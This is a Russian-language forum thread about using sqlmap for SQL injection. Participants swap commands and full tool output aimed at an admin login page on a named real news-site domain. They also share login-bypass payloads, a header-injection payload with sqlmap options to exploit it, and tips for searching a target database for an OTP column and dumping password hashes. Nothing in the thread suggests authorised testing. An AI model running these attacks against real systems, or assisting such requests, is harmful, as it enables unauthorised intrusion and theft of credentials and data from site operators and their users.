Вопросы по SQLMap

LoginUserName · 17 Apr 2018

Мап криво сливает пароли, вот так $1$JJCSUHzQ$fJoUTRgTvE\\/6CsiTRtfFC. при том каждый раз в разных местах подставляет слэшы, как можно исправить проблему? Это md5(unix) хеш

Muracha · 18 Apr 2018

использую sqlmap для вывода таблиц методом POST
Очень смущает, что когда смотришь вручную там ошибка при поставки admin'

Code:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 2' at line 1

Или пользователь не найдет если подставлять:

Code:

username=" or ""="&" or ""="=admin&login=1

Sqlmap говорит вообще разные вещи

Как вывести таблицу или хотя бы авторизоваться админом?
И почему не выводится стандартными средствами sqlmap?

root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql

Code:

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:38:30

[21:38:30] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060326 Firefox/1.5.0.3 (Debian-1.5.dfsg+1.5.0.3-2)'
[21:38:31] [INFO] testing connection to the target URL
[21:38:31] [INFO] testing if the target URL content is stable
[21:38:32] [INFO] target URL content is stable
[21:38:32] [INFO] testing if POST parameter 'username' is dynamic
[21:38:32] [INFO] confirming that POST parameter 'username' is dynamic
[21:38:32] [INFO] POST parameter 'username' is dynamic
[21:38:32] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')
[21:38:33] [INFO] testing for SQL injection on POST parameter 'username'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[21:38:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:38:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:38:45] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:38:46] [WARNING] reflective value(s) found and filtering out
[21:38:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)'
[21:39:07] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:39:20] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:39:32] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:39:44] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[21:39:56] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[21:40:09] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[21:40:22] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[21:40:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[21:40:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[21:40:36] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace'
[21:40:36] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[21:40:36] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[21:40:38] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[21:40:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[21:40:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[21:40:39] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[21:40:40] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[21:40:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[21:40:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[21:41:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[21:41:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[21:41:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[21:41:26] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[21:41:33] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[21:41:41] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[21:41:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:41:56] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:42:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:42:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:42:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:42:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:42:35] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:42:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[21:42:50] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[21:42:57] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:43:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[21:43:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[21:43:04] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[21:43:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[21:43:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[21:43:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[21:43:04] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[21:43:04] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[21:43:05] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[21:43:05] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[21:43:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[21:43:06] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[21:43:06] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[21:43:06] [INFO] testing 'MySQL inline queries'
[21:43:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[21:43:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:43:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[21:43:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[21:43:33] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[21:43:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[21:43:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[21:43:54] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[21:44:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[21:44:13] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (comment)' injectable
[21:44:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:44:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[21:44:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:44:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:44:14] [INFO] target URL appears to have 5 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[21:44:56] [INFO] testing 'MySQL UNION query (30) - 21 to 40 columns'
[21:44:59] [INFO] testing 'MySQL UNION query (60) - 41 to 60 columns'
[21:45:02] [INFO] testing 'MySQL UNION query (30) - 61 to 80 columns'
[21:45:05] [INFO] testing 'MySQL UNION query (30) - 81 to 100 columns'
[21:45:08] [INFO] checking if the injection point on POST parameter 'username' is a false positive
[21:45:08] [WARNING] false positive or unexploitable injection point detected
[21:45:08] [WARNING] POST parameter 'username' does not seem to be injectable
[21:45:08] [INFO] testing if POST parameter 'passw' is dynamic
[21:45:08] [WARNING] POST parameter 'passw' does not appear to be dynamic
[21:45:08] [WARNING] heuristic (basic) test shows that POST parameter 'passw' might not be injectable

RWD · 18 Apr 2018

Muracha said: ↑

использую sqlmap для вывода таблиц методом POST
Очень смущает, что когда смотришь вручную там ошибка при поставки admin'

Code:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 2' at line 1

Или пользователь не найдет если подставлять:

Code:

username=" or ""="&" or ""="=admin&login=1

Sqlmap говорит вообще разные вещи

Как вывести таблицу или хотя бы авторизоваться админом?
И почему не выводится стандартными средствами sqlmap?

root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql

Code:

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:38:30

[21:38:30] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060326 Firefox/1.5.0.3 (Debian-1.5.dfsg+1.5.0.3-2)'
[21:38:31] [INFO] testing connection to the target URL
[21:38:31] [INFO] testing if the target URL content is stable
[21:38:32] [INFO] target URL content is stable
[21:38:32] [INFO] testing if POST parameter 'username' is dynamic
[21:38:32] [INFO] confirming that POST parameter 'username' is dynamic
[21:38:32] [INFO] POST parameter 'username' is dynamic
[21:38:32] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')
[21:38:33] [INFO] testing for SQL injection on POST parameter 'username'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[21:38:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:38:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:38:45] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:38:46] [WARNING] reflective value(s) found and filtering out
[21:38:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)'
[21:39:07] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:39:20] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:39:32] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:39:44] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[21:39:56] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[21:40:09] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[21:40:22] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[21:40:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[21:40:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[21:40:36] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace'
[21:40:36] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[21:40:36] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[21:40:38] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[21:40:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[21:40:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[21:40:39] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[21:40:40] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[21:40:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[21:40:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[21:41:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[21:41:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[21:41:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[21:41:26] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[21:41:33] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[21:41:41] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[21:41:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:41:56] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:42:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:42:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:42:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:42:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:42:35] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:42:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[21:42:50] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[21:42:57] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:43:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[21:43:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[21:43:04] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[21:43:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[21:43:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[21:43:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[21:43:04] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[21:43:04] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[21:43:05] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[21:43:05] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[21:43:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[21:43:06] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[21:43:06] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[21:43:06] [INFO] testing 'MySQL inline queries'
[21:43:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[21:43:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:43:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[21:43:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[21:43:33] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[21:43:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[21:43:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[21:43:54] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[21:44:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[21:44:13] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (comment)' injectable
[21:44:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:44:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[21:44:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:44:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:44:14] [INFO] target URL appears to have 5 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[21:44:56] [INFO] testing 'MySQL UNION query (30) - 21 to 40 columns'
[21:44:59] [INFO] testing 'MySQL UNION query (60) - 41 to 60 columns'
[21:45:02] [INFO] testing 'MySQL UNION query (30) - 61 to 80 columns'
[21:45:05] [INFO] testing 'MySQL UNION query (30) - 81 to 100 columns'
[21:45:08] [INFO] checking if the injection point on POST parameter 'username' is a false positive
[21:45:08] [WARNING] false positive or unexploitable injection point detected
[21:45:08] [WARNING] POST parameter 'username' does not seem to be injectable
[21:45:08] [INFO] testing if POST parameter 'passw' is dynamic
[21:45:08] [WARNING] POST parameter 'passw' does not appear to be dynamic
[21:45:08] [WARNING] heuristic (basic) test shows that POST parameter 'passw' might not be injectable

Click to expand...

--data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql -p username
or
--data "username=admin*&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql

может быть waf или вообще обычная ошибка базы.

Muracha · 18 Apr 2018

Ни один из пунктов выше, увы не сработал. Интересно то что ради эксперемента вбил:
Code:
--level=1 --risk=1 --banner -v 3 --union-cols=1-66
--dbms="MySQL" --technique=EBU --identify-waf --no-cast
Которые в свою очередь так же не сработали.

LoginUserName · 18 Apr 2018

Никто не знает как мап заставить дампить не криво?

Muracha · 18 Apr 2018

LoginUserName said: ↑

Никто не знает как мап заставить дампить не криво?
Click to expand...

Может дело не в sqlmap? я бы попробовал заюзать sqlmap из другой папки, из под kali linux или вообще не sqlmap - если все тоже самое, ну дело не в мапе.

cat1vo · 18 Apr 2018

LoginUserName said: ↑

Никто не знает как мап заставить дампить не криво?
Click to expand...

Скорее всего это не sqlmap сливает "криво", а скрипт в котором найдена инъекция экранирует слеши. Попробуйте проверить руками вывод!

Muracha said: ↑

Sqlmap говорит вообще разные вещи

Как вывести таблицу или хотя бы авторизоваться админом?
И почему не выводится стандартными средствами sqlmap?
Click to expand...

А вы пробовали вручную получить результат? Или кроме как через sqlmap работать с инъекцией в БД вы не умеете? sqlmap - не панацея!

Muracha · 18 Apr 2018

Делал

cat1vo said: ↑

Скорее всего это не sqlmap сливает "криво", а скрипт в котором найдена инъекция экранирует слеши. Попробуйте проверить руками вывод!

А вы пробовали вручную получить результат? Или кроме как через sqlmap работать с инъекцией в БД вы не умеете? sqlmap - не панацея!
Click to expand...

Разумеется делал!

Перебрал сначала возможность авторизации при которой выдавалое сообщение "пользователь не найдет в базе данных".
Синтаксическая ошибка не высвечивалась. Уязвимое только поле "username", на passwd -ноль реакции.
Code:
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
'='
'LIKE'
'=0--+
Затем пытался подобрать таблицы методом order by и вручную union+select+1,2,3-- и тут я везде натыкался на саму ошибку:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 2' at line 1
Поэтому и возникает первоначальный вопрос: почему ручками вижу багу но не могу заюзать ,а sqlmap тоже вначале видит багу, а потом уже говорит - нет не бага...или дело здесь тоже не в нем.

BabaDook · 18 Apr 2018

Кидай сылку

LoginUserName · 18 Apr 2018

cat1vo said: ↑

Скорее всего это не sqlmap сливает "криво", а скрипт в котором найдена инъекция экранирует слеши. Попробуйте проверить руками вывод!

А вы пробовали вручную получить результат? Или кроме как через sqlmap работать с инъекцией в БД вы не умеете? sqlmap - не панацея!
Click to expand...

К сожалению, в ручную не особо умею. Можете подсказать, как в ручную по этапно слить базу с такой уязвимость
Post данные
Code:
sasai=-1'%20OR%203*2*1=6%20AND%20000646=000646%20--%20
Буду благодарен

cna · 18 Apr 2018

$?пм или читай https://forum.antichat.ru//threads/43966/
исп норм соответствие урленкоде с --no-cast --hex --text-only кодировку можно указывать и енкодинг разный так же влияет при блиндах таймауты и конечно --drop-set-cookie --flush-session

Muracha · 18 Apr 2018

Code:
root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql
Эвристический анализ сообщал об уязвимости, а -v 3 говорил неа.
Такой же результат был при
Code:
root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1"
--level=1 --risk=1 --banner -v 3 --union-cols=1-66
--dbms="MySQL" --technique=EBU --identify-waf --no-cast
Использовал параметры не только на
Code:
http://advert.kp.ru/admin//index.phpно и на http://advert.kp.ru/admin//login.php
Во втором случае мне сразу говорил sqlmap, что уязвимость отсутствует.

Sensoft · 19 Apr 2018

Вытащил BD и когда прописую команду для того чтобы просмотреть tables он начинает заново крутить скулю, чё за нах ?
второй раз такая фигня как поставил последнюю версию sqlmap раньше не когда такого не было

LoginUserName · 19 Apr 2018

Sensoft said: ↑

Вытащил BD и когда прописую команду для того чтобы просмотреть tables он начинает заново крутить скулю, чё за нах ?
второй раз такая фигня как поставил последнюю версию sqlmap раньше не когда такого не было
Click to expand...

Пропиши payload, с помощью которого залез в бд

x10 · 18 May 2018

Друзья подскажите пожалуйста нашел уязвимость
A cookie has been set without the secure flag, which means that the cookie can be accessed via unencrypted connections.
Файл cookie установлен без безопасного флага, а это означает, что к файлу cookie можно получить доступ через незашифрованные соединения.
Как это реализовать?

x10 · 18 May 2018

Не ругайте сторого куки эксплуатируются по запросу или по ответу сервера
Я только учусь =(

Sensoft · 20 May 2018

Как выглядит запрос для поиска по колонкам ?
Мне нужна колонка с названием OTP как будет выглядеть параметр для поиска ?

Shubka75 · 20 May 2018

Sensoft said: ↑

Как выглядит запрос для поиска по колонкам ?
Мне нужна колонка с названием OTP как будет выглядеть параметр для поиска ?
Click to expand...

--search -C OTP

Sensoft · 28 May 2018

Первый раз подобный отчёт об SQL
Как прописать запрос в SQLmap ?

Code:

GET / HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.28.0 Safari/5.21
Client-IP: -1' OR 3*2*1=6 AND 000358=000358 or 'tPXGszqn'='
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: localhost
Accept-Language: en
Via: 1.1 wa.www.test.com
Origin: http://www.test.com/
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=2vd8jk6geog2vc0jjem1bbre3g; 05b80234f058b57f104d29b9e=2a31939b37875a015fb294ffca58d009
Host: site.com (тут сайт который я проверял)
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

BabaDook · 28 May 2018

Sensoft said: ↑

Первый раз подобный отчёт об SQL
Как прописать запрос в SQLmap ?

Code:

GET / HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.28.0 Safari/5.21
Client-IP: -1' OR 3*2*1=6 AND 000358=000358 or 'tPXGszqn'='
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: localhost
Accept-Language: en
Via: 1.1 wa.www.test.com
Origin: http://www.test.com/
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=2vd8jk6geog2vc0jjem1bbre3g; 05b80234f058b57f104d29b9e=2a31939b37875a015fb294ffca58d009
Host: site.com (тут сайт который я проверял)
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

Click to expand...

--headers='client-ip:*'

Вопросы по SQLMap

LoginUserName New Member

Muracha Member

RWD Member

Muracha Member

LoginUserName New Member

Muracha Member

cat1vo Level 8

Muracha Member

BabaDook Well-Known Member

LoginUserName New Member

cna New Member

Muracha Member

Sensoft Member

LoginUserName New Member

x10 Well-Known Member

x10 Well-Known Member

Sensoft Member

Shubka75 Elder - Старейшина

Sensoft Member

Attached Files:

Снимок.PNG

BabaDook Well-Known Member

Useful Searches

Вопросы по SQLMap

LoginUserName New Member

Muracha Member

RWD Member

Muracha Member

LoginUserName New Member

Muracha Member

cat1vo Level 8

Muracha Member

BabaDook Well-Known Member

LoginUserName New Member

cna New Member

Muracha Member

Sensoft Member

LoginUserName New Member

x10 Well-Known Member

x10 Well-Known Member

Sensoft Member

Shubka75 Elder - Старейшина

Sensoft Member

Attached Files:

Снимок.PNG

BabaDook Well-Known Member